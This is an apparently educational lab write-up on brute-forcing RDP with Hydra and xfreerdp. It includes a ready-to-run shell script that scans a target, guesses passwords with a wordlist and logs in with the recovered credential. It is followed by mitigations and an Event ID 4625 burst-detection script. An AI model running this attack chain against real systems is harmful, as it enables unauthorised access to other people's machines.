
RDP Brute Force Attack and Remote Login

Use Hydra to brute-force RDP on Windows 10, then verify access by logging in with xfreerdp.

View this project on GitHub

Overview

This lab demonstrates a controlled brute-force attack against RDP in a segmented LAN. After enumerating the target, Hydra is used with a wordlist to attempt credential discovery. Upon success, xfreerdp confirms interactive access.

Scan Port 3389 with Nmap

[Screenshots: Nmap scan of port 3389, steps 1 and 2]

Brute Force with Hydra (RDP + rockyou.txt)

Run Hydra against the RDP service with a known username (-l) and a password wordlist (-P), e.g. rockyou.txt, to attempt password discovery.

[Screenshots: Hydra brute force, steps 1 to 6]

Remote Login with xfreerdp

After Hydra identifies valid credentials, initiate an RDP session using xfreerdp to verify access.

[Screenshots: successful xfreerdp login, steps 1 to 4]
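The three lab steps above as one script, added here as an example and not the lab's own commands. It assumes a lab target at 192.168.56.101, an account named labuser and rockyou.txt at the standard Kali path (all overridable via environment variables), and it only touches a target when started with --run; without arguments it parses a constructed sample of Hydra's output to show what the result line looks like.

```shell
#!/bin/sh
# Added example (not the original lab's code): the lab steps as shell functions.
# Assumptions: lab target 192.168.56.101, account "labuser", rockyou.txt at the Kali path;
# override via environment variables. Only run against hosts you are authorised to test.
set -eu

TARGET="${TARGET:-192.168.56.101}"
USER_NAME="${USER_NAME:-labuser}"
WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"
RDP_PORT="${RDP_PORT:-3389}"

# Step 1: confirm RDP is listening and fingerprint it. rdp-enum-encryption also reports
# which security layers (including CredSSP/NLA) the server accepts.
scan_target() {
    nmap -Pn -p "$RDP_PORT" -sV --script rdp-enum-encryption "$TARGET"
}

# Step 2: single-user dictionary attack. -t 4 keeps the task count low (the rdp module
# misbehaves with many parallel tasks), -W 3 waits 3 s between connects per task,
# -f stops at the first hit, -o writes the results to a file we parse afterwards.
run_hydra() {
    hydra -l "$USER_NAME" -P "$WORDLIST" -s "$RDP_PORT" -t 4 -W 3 -f -o "$1" "rdp://$TARGET"
}

# Hydra reports a hit as:
#   [3389][rdp] host: 192.168.56.101   login: labuser   password: Password1
# Extract it as "login:password" (first hit only; a password containing spaces
# would need a more careful parser than this field split).
parse_hydra_result() {
    awk '$1 ~ /^\[[0-9]+\]\[rdp\]$/ && $4 == "login:" && $6 == "password:" { print $5 ":" $7; exit }'
}

# Step 3: prove interactive access. /cert:ignore skips the self-signed certificate prompt.
login_rdp() {
    cred="$1"
    xfreerdp "/v:$TARGET:$RDP_PORT" "/u:${cred%%:*}" "/p:${cred#*:}" /cert:ignore
}

main() {
    out="$(mktemp)"
    scan_target
    run_hydra "$out" || true          # hydra exits non-zero when no password was found
    cred="$(parse_hydra_result < "$out")"
    [ -n "$cred" ] || { echo "no valid credential found for $USER_NAME" >&2; return 1; }
    echo "valid credential: $cred"
    login_rdp "$cred"
}

# Constructed sample of Hydra's output (not a real capture), used to exercise the parser
# without a target.
SAMPLE_HYDRA_OUTPUT='Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-01 10:00:00
[DATA] attacking rdp://192.168.56.101:3389/
[3389][rdp] host: 192.168.56.101   login: labuser   password: Password1
1 of 1 target successfully completed, 1 valid password found'

case "${1:-}" in
    --run) main ;;
    *)     printf '%s\n' "$SAMPLE_HYDRA_OUTPUT" | parse_hydra_result ;;   # prints labuser:Password1
esac
```

The -t 4 / -W 3 throttling is deliberate: a wordlist run at full speed against RDP drops connections and, on a hardened target, trips the lockout threshold within seconds, which is exactly the behaviour the mitigation section below relies on.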

Ways to Mitigate Against This Attack

There are a handful of ways to mitigate and protect against RDP brute forcing. It is worth noting first that a strategic attacker whose goal is to remain unnoticed would think twice about this technique at all.

A tool like Hydra is loud on a network: every guess is a full RDP or CredSSP handshake against the target and a failed logon event on the host, so a wordlist run produces hundreds of connections per minute from a single source. A well-secured environment with layered protection would catch this in the act.

Account Lockout Policy

Implementing an account lockout policy (lockout threshold, observation window and lockout duration under Account Policies) is the most direct administrative control against this. If the account locks after 5 or 10 failed attempts, Hydra cannot iterate through the wordlist, which stops a single-account dictionary attack like this one. Two caveats: an attacker can use the policy to deliberately lock users out, a denial of service, and password spraying (a few common passwords tried across many accounts) stays under the threshold, so lockout needs to be paired with the other controls below.

MFA - Multi-Factor Authentication on RDP

In a scenario where Hydra does recover the correct account password, MFA on the RDP session makes the credential alone useless. Windows has no built-in second-factor prompt for a plain RDP logon, so MFA is normally enforced at an RD Gateway (for example through an MFA-integrated NPS policy) or with a third-party credential provider on the host. This is increasingly the standard for any internet-facing remote access.

Don't Expose RDP Directly to the Internet

Port 3389 should never be open to the public internet; exposed RDP is scanned and brute-forced continuously. The proper approach is putting RDP behind a VPN, so a client has to authenticate to the VPN before it can even reach the RDP port. This takes the RDP service itself off the external attack surface; the VPN gateway then becomes the exposed service and needs the same care (MFA, patching, its own lockout policy).

Change the Default RDP Port

If you want to go the extra mile, you could change the default RDP port. A service version scan (nmap -sV) still identifies RDP on a non-standard port, but it is less obvious when reading the results of a plain port scan and it filters out mass scanners that only probe 3389. This is security through obscurity, a noise reducer rather than a real control.

Network Level Authentication - NLA

NLA requires the client to authenticate through CredSSP before a full RDP session and the Windows logon screen are set up. This removes the pre-authentication attack surface: unauthenticated clients never reach the login screen or consume a session on the host. One caveat: NLA does not stop password guessing by itself. Hydra's rdp module speaks CredSSP, so the wordlist run still works; the failures simply appear as Event ID 4625 with logon type 3 (network) rather than type 10 (RemoteInteractive), which detection rules need to account for.

Firewall/IP Allowlisting

Restricting inbound 3389 on the host firewall and at the network edge to specific known IP ranges means an attacker coming from any other address cannot even reach the service to attempt a login. Combined with VPN-gated access this is one of the most effective mitigations.

Detection

Windows Event ID 4625 logs failed logon attempts, including the Source Network Address and the logon type (10 for a direct RDP logon, 3 when NLA is enabled). A burst of 4625 events for one account from a single source in a short window is a textbook Hydra signature that any SIEM should be alerting on, and a 4624 from the same source shortly after the burst means a guess succeeded. Event ID 4740 (account locked out) and 4776 (failed NTLM credential validation) corroborate the pattern.
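The detection logic from the paragraph above, added here as an example rather than a rule from the original page. It runs over a constructed CSV export of security events (the column layout is assumed, not Event Viewer's native export format) and flags any source IP with at least a threshold of 4625 failures inside one minute, reports how many distinct accounts that source targeted (one account with many failures is a dictionary attack like this lab; many accounts with a few failures each is a password spray that dodges lockout), and notes whether a 4624 success from the same source followed.

```shell
#!/bin/sh
# Added example (not from the original page): flag Hydra-style 4625 bursts in a CSV export.
# Assumed column layout (constructed, not Event Viewer's native export format):
#   TimeCreated,EventID,LogonType,TargetUserName,IpAddress
set -eu

# Constructed sample: 12 failures in one minute against "labuser" from 192.168.56.20,
# followed by a 4624 (success) from the same source; two unrelated typos from 10.0.0.7.
SAMPLE_LOG="$(
    printf '%s\n' 'TimeCreated,EventID,LogonType,TargetUserName,IpAddress'
    i=1
    while [ "$i" -le 12 ]; do
        printf '2024-05-01T10:00:%02d,4625,10,labuser,192.168.56.20\n' "$i"
        i=$((i + 1))
    done
    printf '%s\n' '2024-05-01T10:00:13,4624,10,labuser,192.168.56.20'
    printf '%s\n' '2024-05-01T10:03:10,4625,10,alice,10.0.0.7'
    printf '%s\n' '2024-05-01T10:17:44,4625,10,bob,10.0.0.7'
)"

# detect_bursts THRESHOLD  < csv
# Prints one line per (source IP, minute) with >= THRESHOLD failed logons:
#   ip minute failures distinct_users success_seen
# distinct_users == 1 with many failures is a single-account dictionary attack;
# many distinct users with few failures each is a password spray under the lockout threshold.
# success_seen == yes means a 4624 from the same source was also present, i.e. a guess worked.
detect_bursts() {
    awk -F, -v thr="${1:-10}" '
        NR > 1 && $2 == 4625 {
            minute = substr($1, 1, 16)               # YYYY-MM-DDTHH:MM bucket
            fails[$5 SUBSEP minute]++
            if (!(($5 SUBSEP $4) in seen)) { seen[$5 SUBSEP $4] = 1; users[$5]++ }
        }
        NR > 1 && $2 == 4624 { success[$5] = 1 }
        END {
            for (k in fails) if (fails[k] >= thr) {
                split(k, p, SUBSEP)
                print p[1], p[2], fails[k], users[p[1]], (p[1] in success ? "yes" : "no")
            }
        }' | sort
}

printf '%s\n' "$SAMPLE_LOG" | detect_bursts 10
# 192.168.56.20 2024-05-01T10:00 12 1 yes
```

A fixed one-minute bucket is deliberately simple; a production rule would use a sliding window and key on the account as well, but the fields it pivots on (source address, target user, logon type, and a 4624 after the burst) are the ones that matter when triaging this attack.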

Core Takeaway: RDP brute forcing is a loud, detectable attack. An account lockout policy is enough to stop a single-account dictionary run like this one, and layering in MFA, VPN-gated access, NLA, IP allowlisting and SIEM alerting on Event ID 4625 makes this attack chain extremely difficult to carry out against a hardened environment. Only low-and-slow guessing or password spraying survives lockout, and both still leave the same event trail.